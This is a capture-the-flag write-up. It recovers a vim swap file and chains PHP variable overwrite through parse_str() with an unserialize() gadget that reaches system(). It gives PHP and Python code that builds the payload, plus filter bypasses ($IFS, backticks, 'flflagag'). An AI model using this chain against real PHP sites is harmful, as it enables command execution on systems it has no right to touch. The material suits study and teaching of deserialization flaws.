web2
A directory scan turned up a leaked source file: .index.php.swp, a vim swap file.
Recover it with vim's -r option (vim -r .index.php.swp) to get the original index.php:
<?php
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        // runs once on unserialize(): every argument is trimmed and filtered
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);   // single pass, not recursive
        return $str;
    }
    function echo($host){
        system("echo $host");   // command injection sink
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
// only the FIRST query parameter becomes a variable ($$key), then the loop breaks
foreach($_GET as $key => $value) {
    if($i===1)
    {
        $i++;
        $$key = $value;
    }
    else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);   // one-argument parse_str(): registers every key of ?a= as a local variable
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);   // user-controlled unserialize(): triggers __wakeup() and __destruct()
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>
A quick analysis of the source:
Stage 1 is variable overwrite through parse_str(). The foreach over $_GET only processes the first query parameter (it breaks after one iteration), so first=doller has to be the first key in the query string to pass the first check. After that, the one-argument parse_str($_GET['a']) registers every key of a as a local variable, so a single a parameter overwrites $var, $bbb and $ccc at once. Only the inner = and & need to be URL-encoded so they reach parse_str() intact instead of being split by the web server:
first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag
That takes us straight to the unserialize() call. (Caveat: the one-argument form of parse_str() is what makes this work; it is deprecated since PHP 7.2 and removed in PHP 8.0.)
Stage 2, the come parameter, is a textbook unserialize() gadget: __wakeup() runs every argument through waf(), then __destruct() calls $this->echo($host), which executes system("echo $host"). To get a command past waf():
backticks are not in the character blacklist, so `cmd` gives command substitution inside the echo;
spaces are stripped, so $IFS is used as the separator instead;
'flag' is only removed in a single str_replace() pass, so the double-written flflagag collapses to flag after filtering;
and because $method and $args are private, their serialized names are \0come\0method and \0come\0args: the NUL bytes must be sent as %00 in the POST body, or the object will not deserialize at all.
<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    // echo() is left out so that __destruct() cannot run the command locally when this script exits
    #function echo($host){
    #    system("echo $host");
    #}
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
// $IFS stands in for the stripped space; 'flflagag' becomes 'flag' after one str_replace() pass
$test = new come("echo",array('`cat$IFS/flflagag`'));
// the output contains raw NUL bytes for the private property names; URL-encode them as %00 before POSTing
echo serialize($test);
?>
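To check the bypass offline before sending anything, here is an added Python script that is not part of the original writeup: it ports waf() to Python, hand-rolls the serialize() output including the NUL-prefixed private property names, and assembles the GET query string and the URL-encoded POST body. The target URL is a placeholder, since the page never names the host.

```python
import re
from urllib.parse import quote

# Assumed target URL: the writeup never gives the host, so this is a placeholder.
TARGET = "http://target.example/index.php"


def waf(s: str) -> str:
    """Python port of come::waf(): drop the blacklisted characters, then delete
    'flag' in a single non-recursive pass (same semantics as PHP str_replace)."""
    s = re.sub(r"[<>*;|?\n ]", "", s)
    return s.replace("flag", "")


def php_str(v: str) -> str:
    """serialize() form of a PHP string; the length is counted in bytes."""
    return f's:{len(v.encode())}:"{v}";'


def serialize_come(method: str, args: list) -> str:
    """Hand-rolled serialize() of a `come` object. Both properties are private,
    so their names are stored as NUL + "come" + NUL + name (hence the %00 in the POST)."""
    items = "".join(f"i:{i};{php_str(a)}" for i, a in enumerate(args))
    body = (php_str("\0come\0method") + php_str(method)
            + php_str("\0come\0args") + f"a:{len(args)}:{{{items}}}")
    return f'O:4:"come":2:{{{body}}}'


def build_exploit(cmd: str = "cat$IFS/flflagag") -> dict:
    """Assemble both stages of the chain and show what the shell will finally run."""
    arg = f"`{cmd}`"  # backticks survive the character blacklist
    # Stage 1: `first` must be the first query key (the foreach stops after one
    # iteration) and the '=' / '&' inside `a` are encoded so parse_str() receives them.
    query = "first=doller&a=" + quote("var=give&bbb=me&ccc=flag", safe="")
    # Stage 2: serialized object in POST `come`; quote() turns the NUL bytes into %00.
    serialized = serialize_come("echo", [arg])
    post_body = "come=" + quote(serialized, safe="")
    # What __wakeup() leaves behind, i.e. the $host that system("echo $host") receives.
    shell_sees = "echo " + waf(arg.strip())
    return {"url": f"{TARGET}?{query}", "query": query, "serialized": serialized,
            "post_body": post_body, "shell_sees": shell_sees}


if __name__ == "__main__":
    r = build_exploit()
    print("POST", r["url"])
    print(r["post_body"])
    print("shell runs:", r["shell_sees"])
    # For comparison, a naive payload loses both its space and its 'flag':
    print("naive payload after waf():", waf("`cat /flag`"))
```

Running it shows why the two tricks are needed: the naive `cat /flag` comes out of waf() as `cat/`, while `cat$IFS/flflagag` comes out as `cat$IFS/flag`, which the shell expands inside the echo. The post_body is what actually goes on the wire; note the %00 before each property name.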
Final payload:
Reference: http://www.cnblogs.com/nul1/p/9502333.html